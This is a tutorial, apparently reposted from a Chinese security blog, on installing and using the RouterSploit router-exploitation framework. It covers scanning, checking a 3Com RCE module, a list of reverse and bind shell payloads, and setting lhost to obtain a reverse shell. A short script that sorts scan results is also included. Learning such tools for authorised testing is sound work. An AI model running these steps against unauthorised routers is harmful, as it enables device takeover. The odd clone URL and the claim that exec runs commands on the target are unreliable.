Getting Started with RouterSploit, a Router Vulnerability Testing Tool

admin, 2023-11-07 20:34:29

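RouterSploit is a vulnerability testing tool built specifically for routers and embedded devices. It provides functions for scanning, discovering and exploiting vulnerabilities in these devices. The tool is written in Python and bundles a large number of exploit modules for routers and related devices, which users can apply in penetration tests and security assessments. RouterSploit is operated through a simple command-line interface and offers scanning, exploitation, brute forcing and more, so that users can assess the security of a target device quickly and effectively.

The main functions of RouterSploit are:

  • Scanning: performs port scanning, service identification and vulnerability scanning against a target router or embedded device, helping users quickly understand the device's security posture.

  • Exploitation: bundles a large number of exploit modules for routers and embedded devices; users can apply them to known vulnerabilities to verify a device's security or to carry out a penetration test.

  • Brute forcing: supports brute forcing the authentication credentials of routers and related devices, helping to assess whether a device's authentication mechanism is secure.

  • Modular framework: has a modular design, so users can easily add new exploit modules or extend existing functions to keep up with changing security needs.

1. Installing on Kali

1.1 Installing RouterSploit

RouterSploit is not installed by default. After you type the routersploit command in a terminal, the system automatically offers to install it; enter "Y" and then the Kali account password, and the installation runs automatically.

It can also be installed by cloning the repository: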

git clone https://github.com/reverse-shell/routersploit

If running it afterwards reports errors, some required dependency packages still need to be installed:

pip install pycryptodome

1.2 Starting RouterSploit

Type routersploit in a terminal to start the RouterSploit framework.

2. Main RouterSploit commands

2.1 Basic commands

1. The help command

Displays help information.

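set: sets a module parameter; for example, set target 192.168.1.1 sets the target host.

2. The show command

info: displays the module's basic information and description.

options: displays the module's configurable options and parameters.

advanced: displays the module's advanced options and parameters.

devices: displays information about known devices.

all: displays all available modules.

encoders: displays the available encoders.

creds: displays credentials that have been captured.

exploits: displays the available exploit modules.

scanners: displays the available scanner modules.

wordlists: displays the available wordlist files.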

show all displays every module in the framework.

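3. run

Executes the current module against the target device.

4. The use command

use <module>: selects the module to use, such as an exploit module or a scanner module. For example: use scanners/autopwn

5. Executing a specified command

exec <shell command> <args>: executes the specified command in a shell; it can be used to run system commands and the like.

In RouterSploit, the exec command can be used to run specific system commands. You can use exec to run all kinds of operating system commands and tools, including but not limited to the following:

(1) Running a system command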

exec run ifconfig

This example runs the ifconfig command on the target device and displays the network interface configuration.

(2) Running other tools:

exec run nmap -sP 192.168.0.1/24

This example runs an nmap scan on the target device to check which hosts are alive in the specified subnet.

(3) Running a custom script

exec run /path/to/custom_script.sh arg1 arg2

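This example runs a custom shell script on the target device and passes it the arguments arg1 and arg2.

6. The search command

search <search term>: searches for modules that match a given keyword.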

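7. Exiting and going back

exit: exits the RouterSploit tool.

back: returns to the previous menu level.

2.2 Symbols in scan results

Three symbols appear during a RouterSploit scan and in its results: [+], [-] and [*]. Their meanings are as follows:

[+] means a vulnerability exists: the scan result shows that the target system has one or more known security vulnerabilities.

[-] means the vulnerability does not exist: the scan result shows that no known security vulnerability was found on the target system.

[*] means undetermined: the scan result shows that it could not be determined whether the target system has a known security vulnerability, possibly because the scan conditions were insufficient or because of other unknown factors.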
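
When auditing your own devices, the three markers above can be triaged automatically. The following is an added example, not part of the original article or of RouterSploit: it groups scanner output lines by marker. The sample lines and their exact layout are constructed assumptions, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed sample of scanner output (not captured from a real device).
# The line layout is an assumption; only the leading marker, the host:port
# pair and the module path are relied on.
SAMPLE_OUTPUT = """\
[*] Running module scanners/autopwn...
[-] 192.168.1.1:80 http exploits/routers/3com/officeconnect_rce is not vulnerable
[*] 192.168.1.1:80 http exploits/routers/dlink/dsl_2740r_dns_change Could not be verified
[+] 192.168.1.1:80 http exploits/routers/dlink/dir_300_600_rce is vulnerable
[-] 192.168.1.1:22 ssh creds/generic/ssh_default is not vulnerable
[+] 192.168.1.1:23 telnet creds/generic/telnet_default is vulnerable
"""

MARKERS = {"[+]": "vulnerable", "[-]": "not_vulnerable", "[*]": "unverified"}
MODULE_RE = re.compile(r"\b((?:exploits|creds)/[\w/-]+)")
ENDPOINT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\b")


def triage(output):
    """Group scanner lines by the marker meanings given in section 2.2."""
    report = defaultdict(list)
    for line in output.splitlines():
        marker = line[:3]
        module = MODULE_RE.search(line)
        if marker not in MARKERS or module is None:
            continue  # banner or status line: no module result to classify
        endpoint = ENDPOINT_RE.search(line)
        report[MARKERS[marker]].append({
            "module": module.group(1),
            "host": endpoint.group(1) if endpoint else None,
            "port": int(endpoint.group(2)) if endpoint else None,
        })
    return dict(report)


def needs_follow_up(report):
    """Confirmed findings and unverified checks both need manual review:
    an unverified [*] result is not a clean result."""
    return sorted(
        finding["module"]
        for key in ("vulnerable", "unverified")
        for finding in report.get(key, [])
    )


if __name__ == "__main__":
    result = triage(SAMPLE_OUTPUT)
    for status, findings in result.items():
        print(status, [f["module"] for f in findings])
    print("follow up:", needs_follow_up(result))
```
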

3. RouterSploit exploitation workflow

3.1 Scanning a router for vulnerabilities with RouterSploit

1. Confirm the router address

tracert www.sina.com.cn

The first result is the address of the local router.

3.2 Scanning the router

use scanners/autopwn

show options

set target 192.168.1.1

run

3.3 Checking for a vulnerability

use exploits/routers/3com/officeconnect_rce

set target 192.168.31.1

check

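3.4 Exploitation

1. Configuring the payload

List of payloads that can be used (obtained with the show all command). Many articles online obtain it with the show payloads command; that command was not found when run in the Kali environment, and it may be available only in the Python version.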

payloads/x86/reverse_tcp

payloads/x86/bind_tcp

payloads/perl/reverse_tcp

payloads/perl/bind_tcp

payloads/armle/reverse_tcp

payloads/armle/bind_tcp

payloads/php/reverse_tcp

payloads/php/bind_tcp

payloads/mipsle/reverse_tcp

payloads/mipsle/bind_tcp

payloads/mipsbe/reverse_tcp

payloads/mipsbe/bind_tcp

payloads/x64/reverse_tcp

payloads/x64/bind_tcp

payloads/cmd/netcat_reverse_tcp

payloads/cmd/perl_reverse_tcp

payloads/cmd/perl_bind_tcp

payloads/cmd/awk_bind_udp

payloads/cmd/awk_bind_tcp

payloads/cmd/python_reverse_udp

payloads/cmd/netcat_bind_tcp

payloads/cmd/php_bind_tcp

payloads/cmd/python_bind_udp

payloads/cmd/python_bind_tcp

payloads/cmd/python_reverse_tcp

payloads/cmd/awk_reverse_tcp

payloads/cmd/php_reverse_tcp

payloads/cmd/bash_reverse_tcp

payloads/python/reverse_udp

payloads/python/bind_udp

payloads/python/reverse_tcp

payloads/python/bind_tcp


(1) Select the appropriate payload

use payloads/x64/reverse_tcp

(2) View the configuration

show options

(3) Set up the payload

set lhost [your IP]

(4) View the configuration again

show options

(5) Start the attack

run

If an exploitable vulnerability exists, a reverse shell is returned.

Originally published on the WeChat public account 小兵搞安全: Getting Started with RouterSploit, a Router Vulnerability Testing Tool
